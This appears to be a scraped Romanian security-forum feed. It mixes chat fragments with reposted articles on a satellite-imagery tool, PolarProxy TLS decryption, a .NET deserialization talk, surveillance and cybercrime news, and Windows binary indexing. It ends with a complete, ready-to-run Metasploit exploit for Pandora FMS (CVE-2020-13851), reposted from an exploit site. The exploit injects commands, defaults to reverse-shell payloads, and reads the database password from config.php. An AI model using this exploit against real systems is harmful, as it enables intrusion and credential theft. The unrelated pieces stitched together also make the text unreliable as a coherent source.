Kev

Pune si 9 link de download, am un pic de timp liber

Spermata dar speri degeaba :))) Au introdus ieri pe seara (25/26.07.2020) intr-un sat, gripa porcina din nou, au confiscat ceva kg. de porci si vaci, etc.. PS: se anunta alta prin august anul viitor

are pe Satana in el wmiprvse.exe

Who should use this tool? TL;DR: Generate JPEG earth imagery from coordinates/location name with publicly available satellite data. This tool is for a sentient being who wants to view high-res satellite imagery of earth, without digging through all the nitty gritty geospatial details of it. So if this is your first time trying to explore how parts of the Earth look from space, you're at the right place. NB: felicette at the present state searches for cloud-cover < 10%, and doesn't constrain results on the basis of dates. One can see Product Roadmap for upcoming features. Installation felicette depends on GDAL. But the following steps cover GDAL's installation as well. rio-color uses numpy headers to setup, thus installing numpy and GDAL=={ogrinfo --version} would be sufficient before installing felicette. Debian $ sudo add-apt-repository ppa:ubuntugis/ppa $ sudo apt-get update $ sudo apt-get install python-numpy gdal-bin libgdal-dev $ gdal-config --version <version-number> * activate virtual environment * $ pip install numpy GDAL==<version-number> $ pip install felicette MacOS $ brew install gdal $ gdal-config --version <version-number> * activate virtual environment * $ pip install numpy GDAL==<version-number> $ pip install felicette Docker As pointed out here, the following docker image works and is volume-mapped to the present working directory. Thanks @milhouse1337 for the docker-image. rio-color, one of the felicette's dependencies isn't available on conda ecosystem yet. Here's the link to a small discussion on an installation-issue. This section would be updated when there is a stable version of felicette for Windows. Felicette has plans to build in-house RGB image enhancement algorithms or use imagemagick /[similar tools on conda-forge] for a Windows release, at least until rio-color is available on conda-forge/conda. Usage To use it: $ felicette --help Usage: felicette [OPTIONS] Satellite imagery for dummies. Options: -c, --coordinates FLOAT... Coordinates in (lon, lat) format. This overrides -l command -l, --location-name TEXT Location name in string format -p, --pan-enhancement Enhance image with panchromatic band -pre, --preview-image Preview pre-processed low resolution RGB satellite image. -v, --vegetation Show Color Infrared image to highlight vegetation --help Show this message and exit. Felicette can download and process Landsat images taking the location's input as (lon, lat) or the location name. They can be used in the following way. With location name: $ felicette -l "Kanyakumari" With coordinates: $ felicette -c 77.5385 8.0883 -p option uses the panchromatic band to enhance image's resolution to 15 meters, contrary to resolution of RGB bands(30 meters). To get a better image using felicette use: $ felicette -p -c 77.5385 8.0883 -pre option downloads a low-res image for preview, to check if the image is worth your computation, Network I/O. $ felicette -pre -p -c 77.5385 8.0883 -v option generates a CIR image to highlight vegetation in 'red' color. Note that, '-p' option isn't taken into consideration while generating CIR imagery in felicette. $ felicette -pre -v -l "Kanyakumari" History Félicette was the first cat launched into space, on 18 October 1963. Even though she landed back on earth safely, Félicette was euthanized two months after the launch so that scientists could perform a necropsy to examine her brain. She was the only cat to have survived spaceflight. Here's a footage of the mission from the archives. When you get a satellite imagery using this tool, imagine Félicette took the picture for you : Preview and examples Here are some more sample images generated by felicette. Here is a link to the original images generated with RGB, CIR options. Following is a recording of the terminal session recording usage of felicette. https://asciinema.org/a/349495 Source

https://www.fancourier.ro/wp-content/uploads/2019/02/Instalare-si-configurare-Woocommerce_EN.pdf /edit: o parte din plugins CMS Tree Page View Admin Menu Tree Page View Simple Fields Simple Fields Map extension Simple History Simple SEO (Search Engine Optimization) EP Admin Messages EP Social Widget Nice Navigation EP Hashimage EP Post Widget EP Display Users Hundstall 404 EP Comments Export EP Image Base64 Encode The 50 most popular WordPress plugins Akismet WordPress SEO by Yoast Contact Form 7 Jetpack by WordPress.com Wordfence Security NextGEN Gallery MailPoet Newsletters All in One SEO Pack WP Super Cache WordPress Importer Google XML Sitemaps iThemes Security (formerly Better WP Security) WooCommerce - excelling eCommerce Meta Slider Fast Secure Contact Form WP-Optimize InfiniteWP Client WordPress Social Sharing Optimization WPtouch Mobile Plugin NextGEN Facebook: Advanced Optimization for All Social Websites Google Maps Ready! Captcha W3 Total Cache Shareaholic &#124; share buttons &#38; related posts MailChimp for WordPress UpdraftPlus Backup and Restoration for WordPress TinyMCE Advanced Broken Link Checker Contact Form Shortcodes Ultimate Ninja Forms All In One WP Security &#38; Firewall WP Statistics Page Builder by SiteOrigin Google Analytics for WordPress WP Google Maps Really Simple CAPTCHA YouTube WP-PageNavi Breadcrumb NavXT Advanced Custom Fields All-in-One Event Calendar Google Analytics Dashboard for WP Regenerate Thumbnails User Role Editor Newsletter BuddyPress Sucuri Security - Auditing, Malware Scanner and Hardening The Events Calendar Black Studio TinyMCE Widget //edit: formateaza textul cand postezi pe viitor

So you're pentesting a .NET application, and you notice the server is deserializing user input—great! You know this is bad in theory, but have no idea how to actually get a shell in time for the engagement. This talk will bring you up to speed on how .NET deserialization works and how to get shells on real applications. In this presentation, we'll dig into the internals of CVE-2019-18935, a deserialization vulnerability that allows RCE on the popular web UI suite Telerik UI for ASP.NET AJAX. After demonstrating how to exploit this issue step-by-step, you'll learn a hands-on approach to debugging a locally running ASP.NET application, quickly assessing the site's attack surface, and examining possible avenues for finding and exploiting insecure uses of deserialization. This talk is intended for penetration testers and security researchers who'd like to begin testing deserialization vulnerabilities in .NET software. Source

PolarProxy is primarily a TLS forward proxy, but it can also be used as a TLS termination proxy or reverse TLS proxy to intercept and decrypt incoming TLS traffic, such as HTTPS or IMAPS, before it is forwarded to a server. The proxied traffic can be accessed in decrypted form as a PCAP formatted data stream, which allows real-time analysis of the decrypted traffic by an IDS as well as post incident forensics with Wireshark. PolarProxy version 0.8.15 and later can import an existing X.509 server certificate (aka leaf certificate or end-entity certificate) in order to perform the TLS decryption using a valid certificate signed by a trusted certificate authority. If no server certificate is provided, then PolarProxy falls back to generating server certificates on the fly and signing them with its own root CA certificate. There are two principal ways to run PolarProxy as a reverse proxy, either as a TLS termination proxy or as a reverse proxy that decrypts and re-encrypts the traffic. PolarProxy as a TLS Termination Proxy The TLS termination proxy mode is useful in order to offload the task of performing TLS encryption to PolarProxy instead of doing the decryption on the web server. This mode can also be used when the proxied services don’t support TLS encryption, such as legacy web servers or servers hosting other unencrypted services that you want to secure with TLS. The following command sequence shows how to create a Let’s Encrypt SSL certificate, convert it to the PKCS#12 format, and load the server certificate into PolarProxy to terminate incoming HTTPS connections. In this setup PolarProxy decrypts the TLS traffic and relays the HTTP traffic to the web server on TCP port 80. sudo certbot certonly --manual --preferred-challenges dns -d example.com,www.example.com sudo openssl pkcs12 -export -out /etc/example.p12 -inkey /etc/letsencrypt/live/example.com/privkey.pem -in /etc/letsencrypt/live/example.com/fullchain.pem --passout pass:PASSWORD sudo mkdir /var/log/TlsTerminationProxy/ sudo ./PolarProxy --terminate --connect 10.1.2.3 --nosni www.example.com --servercert example.com,www.example.com:/etc/example.p12:PASSWORD -p 443,80,80 -o /var/log/TlsTerminationProxy/ Here’s a breakdown of the arguments sent to PolarProxy: terminate : Terminate incoming TLS sessions and forward proxied traffic in unencrypted form. connect 10.1.2.3 : Forward all proxied traffic to 10.1.2.3 instead of connecting to the host name provided in the SNI extension of the TLS ClientHello message. nosni www.example.com : Treat incoming TLS sessions that don’t define a host name with the SNI extension as if they wanna to connect to “www.example.com”. servercert example.com,www.example.com:/etc/example.p12:PASSWORD : Use the server certificate “/etc/example.p12” for incoming connections to “example.com” and “www.example.com”. p 443,80,80 : Listen on TCP port 443, save decrypted traffic in PCAP file as if it was directed to port 80, forward decrypted traffic to port 80. o /var/log/TlsTerminationProxy/ : Save decrypted traffic to hourly rotated PCAP files in “/var/log/TlsTerminationProxy/”. PolarProxy is a generic TLS proxy that doesn’t care what application layer protocol the TLS tunnel carries. So if you want to terminate the TLS encryption of incoming IMAPS sessions as well, then simply append an additional argument saying “-p 993,143,143” to also forward decrypted IMAP sessions to 10.1.2.3. This method can be used in order to wrap almost any TCP based protocol in a TLS tunnel, which can be useful for privacy reasons as well as to prevent network monitoring tools from detecting the actual application layer protocol. PolarProxy as a Reverse TLS Proxy There are setups for which it is preferable to also encrypt the internal sessions between PolarProxy and the final server. One such setup is when the server is hosting a web service with support for the HTTP/2 protocol, which in practice always uses TLS. Luckily PolarProxy is designed to decrypt and re-encrypt proxied traffic while also forwarding important TLS parameters, such as ALPN and SNI, between the internal and external TLS sessions. To use TLS encryption on the inside as well as outside of PolarProxy, simply do as explained in the previous TLS termination section, but remove the “--terminate” argument and change the port argument to “-p 443,80,443” like this: sudo ./PolarProxy --connect 10.1.2.3 --nosni www.example.com --servercert example.com,www.example.com:/etc/example.p12:PASSWORD -p 443,80,443 -o /var/log/ReverseTlsProxy/ PolarProxy will save the decrypted traffic as cleartext HTTP (or HTTP/2) to PCAP files in the “/var/log/ReverseTlsProxy/” directory. Real-Time Analysis of Decrypted Traffic Both the external (client-to-proxy) and internal (proxy-to-server) TCP sessions, in the reverse TLS proxy example above, are encrypted with TLS. This prevents passive network security monitoring tools, such as IDSs, DPI and DLP appliances, from analyzing the application layer data being sent and received. The PCAP files written to “/var/log/ReverseTlsProxy/” can be a valuable forensic asset when investigating an incident, but a real-time stream of the decrypted data is needed in order to swiftly detect and alert on potential security breaches and other incidents. PolarProxy’s “--pcapoverip” option can be used to provide such a real-time stream of the decrypted data passing through the proxy. This data can easily be sent to a network interface using tcpreplay, as explained in our blog post “Sniffing Decrypted TLS Traffic with Security Onion”. Security Considerations The examples shown in this blog post all run PolarProxy with root privileges using sudo, which can be dangerous from a security perspective. PolarProxy is actually designed to be run without root privileges, but doing so prevents it from listening on a port below 1024. Luckily, this issue can easily be overcome with a simple port forwarding or redirect rule. The following iptables redirect rule can be used if PolarProxy is listening on TCP port 20443 and incoming HTTPS request are arriving to the eth0 interface of the proxy: iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to 20443 PolarProxy does not support loading settings from a config file. The password for the PKCS12 certificate will therefore need to be supplied on the command line, which can make it visible from a process listing. If this is a concern for you, then please consider using “hidepid” to hide processes from other users. You can find instructions on how to use hidepid in hardening guides for Debian, Arch, SUSE and most other Linux flavors. Source

cunosc din interiorul unui call center (firma italiana), cei care raspundeau cu "Da" erau tinuti inregistrati inainte sa fie anuntati, iar cei care raspundea cu "Alo" se inchidea apelul se fac montaje (audio) si se porteazã de la o companie la alta, apoi se trezesc cu facturi de habar nu au cu alte cuvinte fraud

da intradevar, scuzele mele /stiu ca la fizică scoteam din cartofi, dțasta am pus botul //indianul face dropshipping pe amazon, acum am observat in descriere

About Law enforcement surveillance isn’t always secret. These technologies can be discovered in news articles and government meeting agendas, in company press releases and social media posts. It just hasn’t been aggregated before. That’s the starting point for the Atlas of Surveillance, a collaborative effort between the Electronic Frontier Foundation and the University of Nevada, Reno Reynolds School of Journalism. Through a combination of crowdsourcing and data journalism, we are creating the largest-ever repository of information on which law enforcement agencies are using what surveillance technologies. The aim is to generate a resource for journalists, academics, and, most importantly, members of the public to check what’s been purchased locally and how technologies are spreading across the country. We specifically focused on the most pervasive technologies, including drones, body-worn cameras, face recognition, cell-site simulators, automated license plate readers, predictive policing, camera registries, and gunshot detection. Although we have amassed more than 5,000 datapoints in 3,000 jurisdictions, our research only reveals the tip of the iceberg and underlines the need for journalists and members of the public to continue demanding transparency from criminal justice agencies. https://atlasofsurveillance.org

Cum?

omul ti-a spus clar, diferenta, re<->-citeste

Traditional financial crime and cyberattacks are converging, requiring new skills and approaches to the problem, officials said. The U.S. Secret Service has created the Cyber Fraud Task Forces (CFTFs), aimed at preventing, detecting and mitigating complex cyber-enabled financial crime – including making arrests and convictions. The CFTF is the result of a formal merging of two of the Secret Service’s existing units into a single unified network. The Electronic Crimes Task Forces (ECTFs) and the Financial Crimes Task Forces (FCTFs), the division said in a recent media statement. The driver for the move is the fact that online cybercrime and financial fraud have converged to the point that it’s impossible to address one without including the other, it said. In fact, nearly all of the Secret Service’s traditional financial crime investigations make use of digital evidence, and the group acknowledged that increasing technological sophistication on the part of bad actors has led to a proliferation of blended cyber-enabled financial crimes. Those include business email compromise (BECs) scams, ransomware attacks, data breaches and the sale of stolen credit cards and personal information on the internet. Keith McCammon, chief security officer and co-founder of Red Canary said that an overwhelming majority of threat actors are financially motivated. The Secret Service also said that it has broken up “hundreds” of COVID19-related cyber-fraud scams since March, when coronavirus lockdowns went into place around the country. It thus has prevented tens of millions of dollars in fraud from occurring, officials said. In terms of specific wins, the Secret Service has halted the illicit sales of online stolen COVID-19 test kits, and is now leading a “nationwide effort to investigate and counter a vast transnational unemployment fraud scheme targeting the U.S. state unemployment programs,” according to the Secret Service. The Secret Service has 42 domestic CFTF locations with two international locations, in London and Rome. The law-enforcement group said that it plans to further extend the CFTF network to include as many as 160 offices across the country and around the globe. Via threatpost.com

I indexed all Windows files which appear in Windows update packages, and created a website which allows to quickly view information about the files and download some of them from Microsoft servers. The files that can be downloaded are executable files (currently exe, dll and sys files). Read on for further information. Motivation During a recent research project, I had to track down a bug that Microsoft fixed in one of the drivers. I needed to find out which update fixed the bug. I knew that the bug exists on an unpatched RTM build, and is fixed on a fully patched system. All I needed was the dozens of file versions of that driver, so that I could look at them manually until I find the version that introduced the fix. Unfortunately, to the best of my knowledge there was no place where one could get just these dozens of files without downloading extra GBs of data, be it ISOs or update packages. While searching for the simplest solution, these are the options I considered: Install an unpatched RTM build with automatic updates disabled, and install each update manually. Get the driver file after each installed update. A more efficient option would be to do a binary search, installing the middle update first, and then continuing with the relevant half of the updates depending on whether that update fixed the bug. Extract each version of the file from a Windows package, such as an update package that can be download from the Microsoft Update Catalog or an archive from the Unified Update Platform. Look for the driver files on the internet. There are various fishy “dll fixer” websites that claim to provide versions of system files. Unfortunately, not only that these websites are mostly loaded with ads and the files are sometimes wrapped with a suspicious exe, they also don’t provide any variety of versions for a given file, usually having only one, seemingly randomly selected version. There are also potentially useful services like VirusTotal, but I didn’t find any such service which allows to freely download the files. Option 3 didn’t work, and I chose option 2 over 1 since downloading and extracting update packages seemed quicker than updating the OS every time. I also chose the Microsoft Update Catalog over the Unified Update Platform, since the latter is not really documented and is more obscure, and other than that provides no obvious benefits. Also, the update history is nicely documented by Microsoft: Windows 10 update history. There’s also Windows 7 SP1 update history and Windows 8.1 update history, but I focused on Windows 10. What’s in an update package Each update package that can be downloaded from the Microsoft Update Catalog is an msu file, which is basically a cab archive. Extracting it results in some metadata and another cab archive, which in turn contains the Windows files of the update. The update files are divided to assemblies, each assembly having a manifest file and a folder with the actual files. I expected that it would be enough to grab the file I’m looking for from the corresponding folder, but it turns out that newer update packages contain forward and reverse differentials instead of the actual files. Only 6 KB, no MZ header, clearly not the file I’m looking for. A quick search about the diff patching algorithm didn’t yield results, and I’d need the base Windows version anyway, so this option didn’t look appealing anymore. Just before giving up and trying the other options (the Unified Update Platform and installing updates manually), I looked at the information that is available in the manifest file. The only potentially interesting piece of information that I found is the list of files, which, among various unhelpful (for me) information, contains the file’s SHA256 hash: <?xml version="1.0" encoding="utf-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0" copyright="Copyright (c) Microsoft Corporation. All Rights Reserved."> <assemblyIdentity name="Microsoft-Windows-SMBServer-v2" version="10.0.19041.153" processorArchitecture="amd64" language="neutral" buildType="release" publicKeyToken="31bf3856ad364e35" versionScope="nonSxS" /> <dependency discoverable="no" resourceType="Resources"> <!-- ... --> </dependency> <file name="srv2.sys" destinationPath="$(runtime.drivers)\" sourceName="srv2.sys" importPath="$(build.nttree)\" sourcePath=".\"> <securityDescriptor name="WRP_FILE_DEFAULT_SDDL" /> <asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#"> <dsig:Transforms> <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" /> <dsig:DigestValue>pD5a0dKSCg7Kc0g1yDyWEX8n8ogPj/niCIy4yUR7WvQ=</dsig:DigestValue> </asmv2:hash> </file> <memberships> <!-- ... --> </memberships> <instrumentation xmlns:ut="http://manifests.microsoft.com/win/2004/08/windows/networkevents" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <!-- ... --> </instrumentation> <localization> <!-- ... --> </localization> <trustInfo> <!-- ... --> </trustInfo> </assembly> You can see it under DigestValue, encoded as base64. In this case, that’s pD5a0dKSCg7Kc0g1yDyWEX8n8ogPj/niCIy4yUR7WvQ= which translates to a43e5ad1d2920a0eca734835c83c96117f27f2880f8ff9e2088cb8c9447b5af4. Can a SHA256 hash help me get the file? Maybe… The Microsoft Symbol Server Having some experience with the Microsoft Symbol Server, I know that it doesn’t only store symbol files, but also the PE (Portable Executable) files themselves. You can refer to the great article Symbols the Microsoft Way by Bruce Dawson for more details, but the most important detail for us is that the format for the path to each PE file in a symbol server is: “%s\%s\%08X%x\%s” % (serverName, peName, timeStamp, imageSize, peName) This means that all we need to retrieve the file from the Microsoft Symbol Server is to know the file’s timestamp and image size. But at this point, we only have the file’s SHA256 hash. VirusTotal to the rescue VirusTotal is a well known service for scanning files and URLs with multiple antivirus products and online scan engines. In addition to the scan results, VirusTotal displays some information about the submitted files. For PE files, it displays information such as imports and resources, but more importantly, it also displays the files’ timestamp and a list of sections. The latter can be used to calculate the file’s image size. In addition, if the file was scanned with VirusTotal before, the information can be retrieved by providing the file hash. That means that for each file previously scanned by VirusTotal, the SHA256 hash is enough to deduce the correct path on the Microsoft Symbol Server and download the file. Back to our example, the a43e5ad1d2920a0eca734835c83c96117f27f2880f8ff9e2088cb8c9447b5af4 hash can be found on VirusTotal, and the parameters that we need are the creation time: Creation Time: 2096-10-28 20:47:11 And the last section in the list of sections: Name: .reloc Virtual Address: 798720 Virtual Size: 12708 … You can Google for an “epoch converter” to convert the creation time to an epoch timestamp: 4002295631, or in hex: 0xee8e2f4f. You might need to append “GMT” to prevent the converter from reading the creation time as a local time. To calculate the image size, just add the virtual address and size of the last section: 798720+12708 = 811428 = 0xc61a4, and then align to the size of a page, which is 0x1000: 0xc7000. Combining the above, we can now build our download link: https://msdl.microsoft.com/download/symbols/srv2.sys/EE8E2F4Fc7000/srv2.sys Here’s a simple Python script which generates a Microsoft Symbol Server link from a file name and a file hash, automating what we just did manually. P.S. In case you’re wondering how come the file was created in 2096, it wasn’t. Starting with Windows 10, the timestamps of the system’s PE files are actually file hashes, a change that was made to allow reproducible builds. For more details see Raymond Chen’s blog post, Why are the module timestamps in Windows 10 so nonsensical?. P.P.S. If you read Bruce Dawson’s article, you saw that he talked about possible collisions in case there are two different files with the same timestamp and image size. He also described how Chrome had this exact problem. But Chrome used real timestamps, what about the pseudo-timestamps which are in fact file hashes that Windows 10 is using? In Windows’ case there are many collisions. I stumbled upon one, and got curious about the actual amount of such collisions, so I wrote a script to find all of them. Here’s the result, 3408 collisions! For most collisions (all but 54) the only different section is .rsrc which contains resource information, which means that the code and the data are the same. Perhaps the hashing algorithm isn’t affected by that section. I took one specific example (aitstatic.exe) and compared my system’s file (in a collision list) with the file served by the symbol server. The two had a different file version, the file served by the symbol server wasn’t signed, and the checksum (the real checksum field in the PE header, not the timestamp-checksum) was different. Also the file that was served by the symbol server was different than all of the files that I found in update packages. Looks like the symbol server sometimes returns a development file instead of a production one, which might be unsigned and have a different version. It might be confusing, and I’ve been bitten by this once, so remember: never trust the version of a file you download from the Microsoft Symbol Server. The other 54 collisions are of .NET PE files, and in this case other sections are different as well. But that doesn’t really matter, since they’re not available via the symbol server at all. Building an index That’s how I solved my problem, downloading several update packages and getting the driver files with the help of VirusTotal. But since all the files are so conveniently available via the Microsoft Symbol Server, I thought that it would be nice to index all of the files once, making the links for all PE files and versions available and saving myself and others from having to go through the procedure in the future. All I had to do is to get the list of updates from the Windows 10 update history page (for now, I looked only at Windows 10 updates), download these updates from the Microsoft Update Catalog, fetch the file names and hashes, query VirusTotal for these hashes, and make some nice interface to search in this index and generate links. Getting the list of updates That was the easy part, a simple Python script did the job. A funny thing I noticed is that the help page titles are edited manually, since they’re almost uniform, but some of them contain minor mistakes. Here are two examples for pages with a properly formatted title: June 18, 2020—KB4567523 (OS Build 19041.331) May 19, 2019—KB4505064 (OS Build 17134.766) And here are a couple of examples of titles with minor mistakes: May 21, 2019—KB4497934 (OS Build OS 17763.529) (an extra “OS”) September 29, 2016 — KB3194496 (OS Builds 14393.222) (“Builds”, but just one build) January 26, 2017—KB 3216755 (OS Build 14393.726) (the only entry with a space after “KB”) July 16, 2019—KB4507465 (OS Build 16299.1296 ) (a space before “)”) Downloading the updates from the Microsoft Update Catalog Most updates are available for three architectures: x86, x64 and ARM64. There are also updates for Windows Server in addition to Windows 10, but most, if not all of them are the same files for both Windows 10 and Windows Server. For now, I decided to limit the scope to x64. This part wasn’t as easy as the previous one, mainly because it’s so time consuming. In addition, it turned out that not all of the updates are available in the Microsoft Update Catalog. Out of the 502 updates available for Windows 10 while writing these lines, only 355 are available for x64. Out of the 147 which aren’t available, 27 are for Windows 10 Mobile (discontinued), one is only for x86, and one is only for Windows Server 2016. The other 118 are truly missing, 2 of which have a “no longer available” notice, and the others’ absence is not explained. Here is a detailed table with all of the updates and their availability for x64. Querying VirusTotal There are files of various types in the update packages, including non-PE files such as txt and png. For now, I decided to focus on exe, dll and sys which are the most common PE file types, even though there are other PE file types such as scr. Querying VirusTotal is quite simple, as I demonstrated with the Python script in the previous section about VirusTotal. The problem was that I needed to query information about 134,515 files, which is not a small amount. I was afraid of a strict rate limiting, but fortunately, the rate limiting wasn’t so strict. After a while I got a response similar to the following: { "error": { "code": "TooManyRequestsError", "message": "More than 1000 requests from 66.249.66.153 within a hour" } } So no more than 1000 requests within an hour, which means 5.5 days of downloading. I could use more computers, but that would be inconvenient. Even though it’s not too bad, I was uncomfortable seeing my script waiting every hour for the next quota of 1000 requests, so I used PyMultitor, the Python Multi Threaded Tor Proxy tool created by Tomer Zait. I heard about the tool a while ago, and finally had the perfect use case for it. I was pleasantly surprised how stable and easy to use it is (stability should also be attributed to the Tor project). With PyMultitor, I was able to reduce the time to 3 days of downloading. Of course, no data is returned if a file was never submitted to VirusTotal. Out of the 134,515 files, 108,470 were submitted, which is a success rate of 80.6%. Not bad! Also, 190 of the files were submitted, but the report for them didn’t contain details about the PE format. Rescanning them solved the problem. The result After building the index of files, I created a simple website which displays the data in a table. Here it is: Winbindex - the Windows Binaries Index All the files that were found in the update packages are listed, but currently only exe, dll and sys files have download links, except for those that weren’t submitted to VirusTotal. Possible further work I think that the index can already be very useful, but it’s not complete. Here are some things that can be done to further improve it: Indexing files from base builds. Currently, files which don’t appear in any update package, but appear in the initial Windows release aren’t indexed. To fill the gap, I’ll probably have to get the corresponding ISO files of the initial Windows releases. Indexing files which aren’t available on VirusTotal. There are several possible options here: Automating a VM that updates itself and grabs all the files. Understanding the diff algorithm to be able to get all the files from the update packages. Using the Unified Update Platform, although I’m not familiar enough with it to say if it can help with this. Indexing files of other architectures: x86 and ARM64, and of other Windows versions: Windows 7, Windows 8/8.1. I don’t plan to do any of that in the near future, but I might do that one day when I stumble upon another task which requires it. Source m417z.com

The reticulate package provides a comprehensive set of tools for interoperability between Python and R. With reticulate, you can call Python from R in a variety of ways including importing Python modules into R scripts, writing R Markdown Python chunks, sourcing Python scripts, and using Python interactively within the RStudio IDE. This cheatsheet will remind you how. Updated March 19. Download: reticulate.pdf (3.92 MB) Source

Editorial Reviews About the Author Kazuo Sakiyama: Associate Professor, The University of Electro-Communications, Tokyo, Japan. Dr Sakiyama’s area of expertise includes digital circuit design, cryptographic embedded systems, and secure computing. He has been working on digital circuit design since 1996. Since 2001 he has focused on cryptographic embedded systems, and has been teaching hardware security in several lectures of advanced cryptography and PBL (project-based learning) courses. Yu Sasaki: Researcher, NTT Secure Platform Laboratories, NTT Corporation, Tokyo, Japan. He has been working on the cryptography since 2004. His research interest has focused on security evaluation of cryptographic protocols and cryptanalysis on symmetric-key primitives. Yang Li: Research Assistant, The University of Electro-Communications, Japan. Download

This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in th e Events feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the target parameter in HTTP POST requests to the Events function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the target parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple grep command on the plaintext /var/www/html/pandora_console/include/config.php file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Pandora FMS Events Remote Command Execution', 'Description' => %q{ This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `Events` feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the `target` parameter in HTTP POST requests to the `Events` function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the `target` parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple `grep` command on the plaintext `/var/www/html/pandora_console/include/config.php` file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). }, 'License' => MSF_LICENSE, 'Author' => [ 'Fernando Catoira', # Discovery 'Julio Sanchez', # Discovery 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-13851'], # RCE via the `events` feature ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities'] ], 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD], 'Targets' => [ [ 'Linux (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' } } ], [ 'Linux (x64)', { 'Arch' => ARCH_X64, 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'Linux (cmd)', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'Privileged' => false, 'DisclosureDate' => '2020-06-04', 'DefaultTarget' => 1 ) ) register_options [ OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']), OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora']) ] end def check vprint_status('Running check') res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php') unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>') return CheckCode::Safe('Target is not a Pandora FMS application.') end @cookie = res.get_cookies html = res.get_html_document full_version = html.at('div[@id="ver_num"]') if full_version.blank? return CheckCode::Detected('Could not determine the Pandora FMS version.') end full_version = full_version.text version = full_version[1..-1].sub('NG', '') if version.blank? return CheckCode::Detected('Could not determine the Pandora FMS version.') end version = Gem::Version.new version unless version <= Gem::Version.new('7.0.744') return CheckCode::Safe("Target is Pandora FMS version #{full_version}.") end CheckCode::Appears("Target is Pandora FMS version #{full_version}.") end def login(user, pass) vprint_status "Authenticating as #{user} ..." res = send_request_cgi!({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'cookie' => @cookie, 'vars_get' => { 'login' => '1' }, 'vars_post' => { 'nick' => user, 'pass' => pass, 'login_button' => 'Login' } }) unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>') fail_with Failure::NoAccess, 'Authentication failed' end print_good "Authenticated as user #{user}." end def on_new_session(client) super if target.arch.first == ARCH_CMD print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.') client.shell_write("grep dbpass include/config.php\n") else print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.') end end def execute_command(cmd, _opts = {}) print_status('Executing payload...') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), 'cookie' => @cookie, 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer' => full_uri('index.php'), 'vars_get' => { 'sec' => 'eventos', 'sec2' => 'operation/events/events' }, 'vars_post' => { 'page' => 'include/ajax/events', 'perform_event_response' => '10000000', 'target' => cmd.to_s, 'response_id' => '1' } }, 0) # the server will not send a response, so the module shouldn't wait for one end def exploit login(datastore['USERNAME'], datastore['PASSWORD']) if target.arch.first == ARCH_CMD execute_command payload.encoded else execute_cmdstager(background: true) end end end # 0day.today [2020-07-12] # Source

